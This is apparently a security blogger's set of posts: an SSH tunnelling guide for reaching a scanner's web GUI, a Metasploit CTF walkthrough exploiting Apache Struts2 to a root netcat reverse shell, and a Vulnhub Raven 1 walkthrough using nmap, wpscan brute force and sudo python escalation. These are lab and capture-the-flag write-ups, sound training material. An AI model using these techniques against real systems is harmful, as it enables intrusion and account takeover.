This works great for command line but what if I need to run a vulnerability scanner that uses a web GUI? Now I need a way to get my local web browser to render a web page two hops away. To explain this better, I’m going to break things down into stages.

First, let’s just deal with a web page that is one hop away. We’ll say our cloud server is hosting an internal page we need to view. sshblog2

This is something I learned from the Metasploit CTF and it’s really quite simple. When connecting from Computer C to Computer B, adding the -D and a port will create a dynamic port forward using a SOCKS 5 proxy. Browsers can the be set to use the proxy to reach the webpage. In this case, I told SSH to use 9392 as the proxy port but this could be anything. I then set Firefox to use the proxy on localhost 9392. Then I simply enter the URL as if I was browsing locally on Computer B. The proxy sends the URL requests over the SSH connection and now I can browse any and all web pages as if I was locally on Computer B.

CompC:
ssh -i PATH/TO/KEY/FILE UserName@AddressForCompB -D 9392
Set Firefox Socks5 proxy to 127.0.0.1 port 9392
Set URL to anything reachable by CompB

So that’s great and all, but the computer I really need to access with the browser is one more hop away. First, we’ll need to combine some concepts before adding the last piece.

sshblog3

Here I’ve combined the first and second scenarios. Computer A still makes the same reverse connection. The only difference is that now it also hosts an internal web page for a vulnerability scanner on port 9392 (That’s what OpenVAS uses in case you’re wondering). Anyway, it’s nothing different than scenario one.

CompA:
ssh -N -i PATH/TO/Key/File – R 2200:localhost:22 UserName@AddressForCompB

Computer C connects to Computer B just like in Scenario two. Nothing new here either.

CompC:
ssh -i PATH/TO/KEY/FILE UserName@AddressForCompB -D 9392
Set Firefox Socks5 proxy to 127.0.0.1 port 9392
Set URL to web address on CompC – https://127.0.0.1:9392/login/login.html

The one thing that’s missing is a connector. Connecting with a normal SSH command, like in scenario one, on Computer B will not work.  Our proxy would forward the traffic to Computer B, but Computer B wouldn’t know what to do with it. Computer B would think Computer C is looking for something hosted on it’s internal port. That’s not what we want. Now let’s add the final connector.

CompB:
ssh -p 2200 UserForCompA@localhost -L 9392:localhost:9392

sshblog4

Using a static port forward, Computer B will now take anything that comes in on port 9392(the socks 5 proxy from Computer C for example) and forward it to 9392 on Computer A using the SSH connection on the internal port 2200.  Now I can browse to the vulnerability scanner’s GUI interface just as if I was locally on Computer C. It is important to note that if the web page redirects to a different port, it will break the connection. This is different than in scenario two where Computer C could browse to any page. Scenario three is confined to just a single port.

Hopefully that all made sense. It’s much easier to understand when you’re actually doing it. I would encourage you to set up a lab and give it a try. You could even add an extra step and configure Burp Suite along the path. While that wouldn’t be helpful in a vuln-scanning scenario, you never know when you might just need to view a remote web page.

-R3a50n

MetasploitCTF 10 of Hearts Walkthrough

This year I participated in the Rapid7 Metasploit Community CTF. I wouldn’t say it was beginner level, but it was fun none the less. For the CTF there were 15 png images for the flags. Each flag was worth 100 points. At the start of the event, each team was given a Kali jump box to attack from and two vulnerable machines (one Linux – one Windows) to exploit. You’d think that once a host is compromised, all the flags would be available to find. That wasn’t the case. Each exploitable service was running in its own container. If that service was compromised, then only the flag associated with it would be available. Anyway, ended up with only one flag and three shells. It seems kind of lame, but I learned stuff in the process so that makes it all worth it.

Setting up:

One of the most important takeaways from the event was learning how to set up a port forward for my browser. Previously, I had only used a VNC server to get GUI control and from there use a browser. I did that during the first day of the CTF and it was awful! The next day I looked for a better solution. Someone in the chat posted something about a -D command in SSH. I’m so glad they did! With the -D option SSH will allow dynamic port forwarding and it’s awesome!

Run the ssh command as normal and simply append the -D and a port number of your choosing at the end. This will open a listening port on your local host 127.0.0.1.

met1

Now configure a web browser proxy using the port.

Make sure to:

  1. Select the same port you put in the SSH command
  2. Use 127.0.0.1 as the host to connect to
  3. Select Socks 5 specifically – Using the “for all connections didn’t work for me”
  4. Remove any disable or ignore settings for 127.0.01

Also make sure that your proxy is enabled. I like using FoxyProxy but it works the same with the default browser options.

met2

 

The proxy can also work with BurpSuite. Just put the proxy setting for SSH in the user tab of Burp and point your browser proxy to Burp. It works amazingly well.

Ok now that our browser is setup, we need to find something to exploit. Running Nmap shows a lot of open services to poke at. For this walkthrough, I’m focusing on port 8080 running Apache Struts2.

met3

Let’s brows there with our cool new setup and see what it looks like.

met4

Yep it’s for sure running Apache Struts. Let’s see if Metasploit has any exploits for that. Doing a simple search for “struts” brings up a small list of options. I picked the most recent exploit listed.

met5

Since I had no idea if this exploit would apply or how it worked, I brought up the description by using the info command.

met6

met7

Well I don’t have the exact version of struts, but this exploit covers a wide range. It could still work. So I set the rhost and looked through the options.

met8

So this is the second time the redirect action was mentioned. Also, showcase.action was the default action brought up when we browsed to the page. This could work. The rport was already set, but the target information was set to auto. That doesn’t always work so I looked at the options.

met9

Then I manually set it to Linux. Once the target was set the default payload is set as well. Notice it’s not a reverse shell, but a command execution. I would have to supply the command.

met10

The first time I actually chose a ping command (ping -c 4 myIP) so that it would ping back on my own system. I did that because I didn’t think I’d be able to see the output of my command and by using ping, I could see if my command worked by capturing the pingbacks with tcpdump. It did, but this particular payload will also display the output of the command. So for this walkthrough I’m just going to use whoami.

met11

Now let’s execute it. Nope … Failed ☹

Notice how it mentions the Action? We know the target’s right, but we might need a different action.

met12

Going back to the browser and selecting the config tab enables the user to brows for various actions. That’s pretty helpful!

met13

Working my way down through the different actions I finally came to the help action.

met14

met15

When I clicked the link, I noticed that I was redirected to date.action. Hmmmm … this might work.

met16

So I set the action to help.action and tried again.

met17

Success and ROOT!

met18

So now that I have root command execution, I should be able to get a shell. There is one small issue. The semicolon (;) character is not allowed through this exploit. That takes away a lot of options for getting a reverse shell through this command … at least directly. The box does have netcat, but it’s missing the -e option to make things easy on us. Luckily there’s another way to abuse the presence of netcat. Using a first in, first out, named pipe it is possible to get the connection we need.

Since this command does contain semicolon characters, I put it into a file and downloaded it. I used nano to create the file and put in the code.

met31

Now I setup a python http server.

met25

Then I set my Metasploit command to run wget to download the file. Once the command was given, I could see the success broadcast to me in Metasploit.

met20

I could also see it on the HTTP server.

met21

In order to run the script, the permissions settings need to be set to execute. I just set it to 777 to make things easy on me, but in real life that’s probably a bad idea.

met22

There’s never any output from that command if it works so I assumed it did. Now I need to setup a listener. This also could have been done in Metasploit, but this way was just faster.

met23

Now I set the command in Metasploit to run the script. When I run it, it hangs. That’s actually a good sign.

met24

Going back to my netcat listener, I can see that I have a shell!

met25

I have a root shell!!

met26

Now I need to find the flag. Since I didn’t know what flag it was, I just started searching for files with the various card names. I was very happy when I got a hit on hearts. It also wasn’t very far away.

met27

Since this box had md5sum installed, I was able to get the flag hash and upload it for some points, but I also wanted to see it.

met28

While browsing around the website earlier, I found a docs directory. By putting the flag into the docs web directory I could now view and save it.

met29

There is the 10 of hearts in all its glory.

met30

So that was the 10 of Hearts challenge from the 2018 Metasploit CTF. While I didn’t get anywhere near the amount of flags I wanted to, it was still fun and I learned some really cool things. I can’t wait to read some of the other write-ups to see how close I was on some of the other flags.

-R3a50n

 

 

 

Vulnhub Raven 1 Walkthrough

By R3a50n
11-16-2018

Raven

Intro:

Raven 1 is listed as a beginner/intermediate CTF box on Vulnhub. I would classify it more as beginner but it always depends on the attacker’s skill set. I would recommend running it in VMWare because of the trouble I had trying to get it running with VirtualBox.

Quick warning about the commands in this post. The font on this site will make double dashes look like one long dash. If you’re getting syntax errors or other unexpected results, check the commands help reference.

Ok on with the hacky stuff …

Step 1:

Identify the IP Address

netdiscover -r 192.168.2.0/24

In my lab it came out as 192.168.2.40 but yours may vary.

Step 2:

Nmap Scan

nmap -sC -sV -v 192.168.2.40 -oN map1

This will do version scanning, apply default scripts, verbose and dump it to a file. Keep in mind this will only scan the most popular 1000 ports unless otherwise specified.

raven1

Here we can see 22 (ssh), 80 (http) and 111 (rpc) are open. RPC gives us some information on some other ports but that’s not necessary. Let’s take a look at the web port.

Step 3:

Brows to site

raven2

Looks like WordPress but let’s look around a little. In source of the service tab, the first flag becomes visible.

raven3

Navigating to the Blog tab confirms it’s WordPress, but it looks broken

raven4

Looking at the source we can see it’s trying to locate raven.local.

raven5

By adding 192.168.2.40 raven.local to the /etc/hosts file, we can make things resolve properly.

raven6

Step 4:

Scan WordPress

Since this is WordPress, let’s run a wpscan and see if we can enumerate some users.

wpscan –url 192.168.2.40/wordpress –enumerate u

raven7

Going to the login page, I tried to guess the passwords, but nothing worked. I did find out that there are no lockouts. This makes it a perfect candidate for a brute force attempt.

raven8

Step 5:

Brute Force

Wpscan will do brute force attempts on enumerated users, however, it will only do one at a time. I wanted to do both users at the same time so I ran two different instances of wpscan each with one of the user names.

wpscan –url 192.168.2.40/wordpress -U steven -w /usr/share/wordlists/rockyou.txt — threads 25

After some time, the steven account displayed an error on one of the responses.

raven9

Let’s try it anyway … and it works!

raven10

Here you can also find flag3 within the posts.

raven11

Step 6:

SSH

So now we could try to bypass WordPress file upload restrictions to get a shell, but first let’s try something else. Remember the SSH port? The user may have reused his credentials there.

Let’s try it!

raven12

Step 7:

Post Exploration – Root – Final Flag

It worked! Now we have a user access on the box. Now if you’re hunting for flags, our missing Flag2 can be found in the /var/www directory.

raven13

Ok let’s get root. One of the first things to check is our sudo permissions

raven14

This is great! We can run python as root which means we can basically do whatever we want. Let’s get a bash shell. The command I’m using is normally used to upgrade shell’s that don’t have tty support, but it works perfectly fine in this situation as well.

raven15

Root Dance!
And now we can go for that final flag …

raven16

That was Raven 1. Another path to getting the initial shell would have been to brute force the SSH login. I didn’t do it initially because SSH brute forcing usually takes forever, but it does work. The wpscan brute force took over an hour, though I did have the threads split between two different accounts. With access to the WordPress directory you can get the root MySQL password and search the database. You could potentially crack the other user password using hashcat or john faster than the wpscan brute force. In the end that wasn’t needed.

Final Thoughts:

Raven 1 was more basic than intermediate, but decent for those just starting out. I don’t love brute force as a path on a CTF, but it is a good skill to learn. I thought flag2 was in a strange place and only found it by searching the file system after rooting the box. Putting it in one of the user directories (steven has access to both) would have made more sense. Anyway, it wasn’t a bad way to spend a few hours. I’ll have to try Raven 2 soon.

I also made a video with some extra content at the end. It shows SSH brute forcing with hydra and WordPress brute force with BurpSuite. You can find it here.

Happy Hacking

-R3a50n